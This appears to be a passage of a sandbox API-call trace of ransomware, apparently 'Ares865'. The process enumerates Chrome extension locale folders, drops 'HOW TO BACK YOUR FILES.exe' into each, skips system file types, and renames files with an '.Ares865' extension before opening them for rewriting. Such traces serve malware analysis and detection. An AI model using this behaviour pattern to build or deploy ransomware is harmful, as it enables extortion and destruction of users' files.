RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2468 | out: ListHead=0x2e7710, ListEntry=0x2d2468) returned 0x2d2528 [0100.792] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86a22430, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e338680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e338680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt_BR", cAlternateFileName="")) returned 1 [0100.793] lstrcmpiW (lpString1="pt_BR", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0100.793] lstrcmpiW (lpString1="pt_BR", lpString2="aoldtz.exe") returned 1 [0100.793] lstrcpyW (in: lpString1=0x2cce510, lpString2="pt_BR" | out: lpString1="pt_BR") returned="pt_BR" [0100.793] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2480 [0100.793] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x11c) returned 0x2e22d0 [0100.793] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2488 | out: ListHead=0x2e7710, ListEntry=0x2d2488) returned 0x2d2468 [0100.793] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869d6170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e312520, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e312520, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt_PT", cAlternateFileName="")) returned 1 [0100.793] lstrcmpiW (lpString1="pt_PT", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0100.793] lstrcmpiW (lpString1="pt_PT", lpString2="aoldtz.exe") returned 1 [0100.793] lstrcpyW (in: lpString1=0x2cce510, lpString2="pt_PT" | out: lpString1="pt_PT") returned="pt_PT" [0100.793] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2340 [0100.793] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x11c) returned 0x2e23f8 [0100.793] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2348 | out: ListHead=0x2e7710, ListEntry=0x2d2348) returned 0x2d2488 [0100.793] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869d6170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e312520, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e312520, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ro", cAlternateFileName="")) returned 1 [0100.793] lstrcmpiW (lpString1="ro", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0100.793] lstrcmpiW (lpString1="ro", lpString2="aoldtz.exe") returned 1 [0100.793] lstrcpyW (in: lpString1=0x2cce510, lpString2="ro" | out: lpString1="ro") returned="ro" [0100.793] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d25c0 [0100.793] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x2e2520 [0100.793] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d25c8 | out: ListHead=0x2e7710, ListEntry=0x2d25c8) returned 0x2d2348 [0100.793] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869fc2d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e312520, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e312520, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ru", cAlternateFileName="")) returned 1 [0100.793] lstrcmpiW (lpString1="ru", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0100.793] lstrcmpiW (lpString1="ru", lpString2="aoldtz.exe") returned 1 [0100.794] lstrcpyW (in: lpString1=0x2cce510, lpString2="ru" | out: lpString1="ru") returned="ru" [0100.794] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d22e0 [0100.794] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x324fc8 [0100.794] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d22e8 | out: ListHead=0x2e7710, ListEntry=0x2d22e8) returned 0x2d25c8 [0100.794] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869fc2d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e312520, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e312520, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="se", cAlternateFileName="")) returned 1 [0100.794] lstrcmpiW (lpString1="se", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0100.794] lstrcmpiW (lpString1="se", lpString2="aoldtz.exe") returned 1 [0100.794] lstrcpyW (in: lpString1=0x2cce510, lpString2="se" | out: lpString1="se") returned="se" [0100.794] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2540 [0100.794] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x3250f0 [0100.794] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2548 | out: ListHead=0x2e7710, ListEntry=0x2d2548) returned 0x2d22e8 [0100.794] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869fc2d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e312520, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e312520, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sk", cAlternateFileName="")) returned 1 [0100.794] lstrcmpiW (lpString1="sk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0100.794] lstrcmpiW (lpString1="sk", lpString2="aoldtz.exe") returned 1 [0100.794] lstrcpyW (in: lpString1=0x2cce510, lpString2="sk" | out: lpString1="sk") returned="sk" [0100.794] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d24c0 [0100.794] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x325218 [0100.794] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d24c8 | out: ListHead=0x2e7710, ListEntry=0x2d24c8) returned 0x2d2548 [0100.794] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869d6170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e2ec3c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e2ec3c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sl", cAlternateFileName="")) returned 1 [0100.794] lstrcmpiW (lpString1="sl", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0100.794] lstrcmpiW (lpString1="sl", lpString2="aoldtz.exe") returned 1 [0100.794] lstrcpyW (in: lpString1=0x2cce510, lpString2="sl" | out: lpString1="sl") returned="sl" [0100.794] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d24e0 [0100.794] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x325340 [0100.795] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d24e8 | out: ListHead=0x2e7710, ListEntry=0x2d24e8) returned 0x2d24c8 [0100.795] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86a22430, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e2ec3c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e2ec3c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sr", cAlternateFileName="")) returned 1 [0100.795] lstrcmpiW (lpString1="sr", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0100.795] lstrcmpiW (lpString1="sr", lpString2="aoldtz.exe") returned 1 [0100.795] lstrcpyW (in: lpString1=0x2cce510, lpString2="sr" | out: lpString1="sr") returned="sr" [0100.795] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2500 [0100.795] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x325468 [0100.795] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2508 | out: ListHead=0x2e7710, ListEntry=0x2d2508) returned 0x2d24e8 [0100.795] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86a22430, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e2ec3c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e2ec3c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="th", cAlternateFileName="")) returned 1 [0100.795] lstrcmpiW (lpString1="th", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0100.795] lstrcmpiW (lpString1="th", lpString2="aoldtz.exe") returned 1 [0100.795] lstrcpyW (in: lpString1=0x2cce510, lpString2="th" | out: lpString1="th") returned="th" [0100.795] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2640 [0100.795] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x325590 [0100.795] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2648 | out: ListHead=0x2e7710, ListEntry=0x2d2648) returned 0x2d2508 [0100.795] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869b0010, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e2c6260, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e2c6260, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tr", cAlternateFileName="")) returned 1 [0100.795] lstrcmpiW (lpString1="tr", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0100.795] lstrcmpiW (lpString1="tr", lpString2="aoldtz.exe") returned 1 [0100.795] lstrcpyW (in: lpString1=0x2cce510, lpString2="tr" | out: lpString1="tr") returned="tr" [0100.795] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2660 [0100.795] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x3256b8 [0100.795] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2668 | out: ListHead=0x2e7710, ListEntry=0x2d2668) returned 0x2d2648 [0100.795] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869d6170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e2c6260, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e2c6260, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uk", cAlternateFileName="")) returned 1 [0100.795] lstrcmpiW (lpString1="uk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0100.795] lstrcmpiW (lpString1="uk", lpString2="aoldtz.exe") returned 1 [0100.796] lstrcpyW (in: lpString1=0x2cce510, lpString2="uk" | out: lpString1="uk") returned="uk" [0100.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2680 [0100.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x3257e0 [0100.796] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2688 | out: ListHead=0x2e7710, ListEntry=0x2d2688) returned 0x2d2668 [0100.796] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869fc2d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e2c6260, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e2c6260, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vi", cAlternateFileName="")) returned 1 [0100.796] lstrcmpiW (lpString1="vi", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0100.796] lstrcmpiW (lpString1="vi", lpString2="aoldtz.exe") returned 1 [0100.796] lstrcpyW (in: lpString1=0x2cce510, lpString2="vi" | out: lpString1="vi") returned="vi" [0100.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d26a0 [0100.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x325908 [0100.796] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d26a8 | out: ListHead=0x2e7710, ListEntry=0x2d26a8) returned 0x2d2688 [0100.796] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869fc2d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e2c6260, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e2c6260, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh_CN", cAlternateFileName="")) returned 1 [0100.796] lstrcmpiW (lpString1="zh_CN", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0100.796] lstrcmpiW (lpString1="zh_CN", lpString2="aoldtz.exe") returned 1 [0100.796] lstrcpyW (in: lpString1=0x2cce510, lpString2="zh_CN" | out: lpString1="zh_CN") returned="zh_CN" [0100.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d26c0 [0100.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x11c) returned 0x325a30 [0100.796] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d26c8 | out: ListHead=0x2e7710, ListEntry=0x2d26c8) returned 0x2d26a8 [0100.796] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86a22430, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e2a0100, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e2a0100, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh_TW", cAlternateFileName="")) returned 1 [0100.796] lstrcmpiW (lpString1="zh_TW", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0100.796] lstrcmpiW (lpString1="zh_TW", lpString2="aoldtz.exe") returned 1 [0100.796] lstrcpyW (in: lpString1=0x2cce510, lpString2="zh_TW" | out: lpString1="zh_TW") returned="zh_TW" [0100.797] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d26e0 [0100.797] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x11c) returned 0x325b58 [0100.797] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d26e8 | out: ListHead=0x2e7710, ListEntry=0x2d26e8) returned 0x2d26c8 [0100.797] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86a22430, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e2a0100, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e2a0100, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh_TW", cAlternateFileName="")) returned 0 [0100.797] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0100.797] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d26e8 [0100.797] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW" [0100.797] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW" [0100.797] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0100.797] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_tw\\how to back your files.exe"), bFailIfExists=1) returned 0 [0100.798] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0100.798] GetLastError () returned 0x0 [0100.798] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0100.798] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86a22430, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e2a0100, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e2a0100, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0100.798] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.798] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0100.798] lstrcpyW (in: lpString1=0x2cce51c, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0100.798] lstrlenW (lpString="messages.json") returned 13 [0100.798] lstrlenW (lpString="Ares865") returned 7 [0100.798] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0100.799] lstrlenW (lpString=".dll") returned 4 [0100.799] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0100.799] lstrlenW (lpString=".lnk") returned 4 [0100.799] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0100.799] lstrlenW (lpString=".ini") returned 4 [0100.799] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0100.799] lstrlenW (lpString=".sys") returned 4 [0100.799] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0100.799] lstrlenW (lpString="messages.json") returned 13 [0100.799] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\messages.json.Ares865") returned 163 [0100.799] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_tw\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_tw\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.801] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_tw\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.802] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=249) returned 1 [0100.807] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN" [0100.807] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN" [0100.807] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0100.807] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_cn\\how to back your files.exe"), bFailIfExists=1) returned 0 [0100.808] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0100.808] GetLastError () returned 0x0 [0100.809] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0100.809] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_CN\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869fc2d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e2c6260, ftLastAccessTime.dwHighDateTime=0x1d56a3b, 